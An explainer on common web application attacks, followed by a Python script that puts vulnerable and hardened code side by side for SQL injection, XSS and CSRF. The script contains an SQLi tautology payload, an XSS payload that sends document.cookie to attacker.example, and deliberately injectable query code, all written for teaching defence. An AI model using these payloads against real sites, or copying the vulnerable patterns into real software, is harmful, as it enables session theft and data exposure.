Web application security refers to the processes, technologies and methods used to protect web servers, web applications and web services such as APIs from attack by Internet-based threats. It is crucial to protecting data, customers and organizations from data theft, interruptions in business continuity and other harmful results of cybercrime.

Web application security is a central component of any web-based business. The global nature of the Internet exposes web properties to attack from any location, at varying levels of scale and complexity.
Common web application security vulnerabilities
Attacks against web apps range from targeted database manipulation to
large-scale network disruption. The most common attacks include:
- Cross-site scripting (XSS) - XSS is a vulnerability that allows an
attacker to inject client-side script into a web page so that it runs in
other users' browsers with the privileges of the vulnerable site. The script
can read session cookies or page contents, perform actions as the user,
or trick the user into revealing sensitive information.
- SQL injection (SQLi) - SQLi occurs when an application builds a database
query by concatenating untrusted input into the SQL text, so an attacker can
change the structure of the query rather than merely supplying a value.
Attackers use SQLi to read data they are not authorized to see, to modify
or create user accounts and permissions, or to otherwise manipulate or
destroy sensitive data. Parameterized queries (prepared statements) are the
standard defense.
- Denial-of-service
(DoS) and distributed denial-of-service (DDoS) attacks - Through a variety of vectors, attackers
overload a targeted server or its surrounding infrastructure with
different types of attack traffic. When a server can no longer
effectively process incoming requests, it slows down and
eventually denies service to legitimate users.
- Memory corruption - Memory corruption occurs when a
location in memory is unintentionally modified, leading to unexpected
behavior in the software. Attackers look for bugs that let them trigger
memory corruption, most commonly buffer overflows, and exploit them to
inject code or hijack the program's control flow.
- Buffer overflow - A buffer overflow occurs when software writes more
data to a fixed-size region of memory, known as a buffer, than the buffer
can hold. The excess data overwrites adjacent memory locations. An attacker
who controls the overflowing data can use this to corrupt program state or
inject malicious code, potentially gaining control of the targeted machine.
- Cross-site request forgery (CSRF) - CSRF involves
tricking a victim's browser into sending a request to a site where the
victim is already authenticated. Because the browser attaches the victim's
session cookie automatically, the request appears to come from the user,
and the attacker can perform any state-changing action the user is
permitted to make, such as modifying or destroying important information,
without ever learning the user's credentials. Highly privileged accounts
such as administrators or executives are commonly targeted.
- Data breach - Unlike the specific attack vectors above,
a data breach is a general term referring to the release of sensitive or
confidential information, whether through malicious action or by
mistake. The scope of what is considered a data breach is fairly wide, and
may range from a few highly valuable records to millions of
exposed user accounts.
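To make three of the attacks above concrete, the following Python script shows a vulnerable and a hardened version of the same operation for SQL injection, cross-site scripting and CSRF. This is an added example, not code from the original page; the in-memory `users` table, the payload strings, the function names and the `session`/`form` dictionaries standing in for a web framework's session and request are all constructed for illustration.

```python
"""Vulnerable vs. hardened handling of SQL injection, XSS and CSRF.

Added illustration, not code from the original page. The users table,
the payloads and all function names are constructed for this example."""
import html
import hmac
import secrets
import sqlite3


def make_db():
    """Constructed in-memory sample database; not real user data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (name, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    conn.commit()
    return conn


# --- SQL injection -----------------------------------------------------------

def find_user_vulnerable(conn, name):
    """Builds the query by string formatting, so the input becomes SQL text."""
    query = f"SELECT name, role FROM users WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, name):
    """Parameterized query: the driver passes the value separately from the
    SQL text, so quotes in the input can never change the query's structure."""
    return conn.execute(
        "SELECT name, role FROM users WHERE name = ?", (name,)
    ).fetchall()


# Classic tautology payload: turns WHERE name = 'x' OR '1'='1' into "match every row".
SQLI_PAYLOAD = "x' OR '1'='1"


# --- Cross-site scripting ----------------------------------------------------

def render_greeting_vulnerable(name):
    """Reflects untrusted input straight into HTML."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_safe(name):
    """Escapes <, >, &, ' and " so the input is displayed as text, not parsed as markup."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


# Constructed script that would run in the victim's browser and leak document.cookie.
XSS_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


# --- Cross-site request forgery ----------------------------------------------

def issue_csrf_token(session):
    """Generate a per-session random token and store it server-side; the app
    embeds it in every state-changing form. A page on another origin cannot
    read it, so a forged request cannot include it."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def handle_transfer(session, form):
    """A state-changing endpoint that only honours requests carrying the token.
    Returns (status_code, message). The session cookie alone is not enough,
    because the browser sends it on cross-site requests too."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    # Constant-time comparison on bytes, so odd input cannot raise or leak timing.
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    db = make_db()
    print("SQLi, vulnerable:", find_user_vulnerable(db, SQLI_PAYLOAD))
    print("SQLi, safe:      ", find_user_safe(db, SQLI_PAYLOAD))
    print("XSS, vulnerable: ", render_greeting_vulnerable(XSS_PAYLOAD))
    print("XSS, safe:       ", render_greeting_safe(XSS_PAYLOAD))
    session = {}
    token = issue_csrf_token(session)
    print("CSRF, forged:    ", handle_transfer(session, {"amount": "100", "to": "mallory"}))
    print("CSRF, legitimate:", handle_transfer(session, {"amount": "100", "to": "bob", "csrf_token": token}))
```

Running the script shows the vulnerable lookup returning every row for the tautology payload while the parameterized version returns nothing, the escaped greeting rendering the script tag as visible text, and the transfer endpoint rejecting a request that carries the session but not the token.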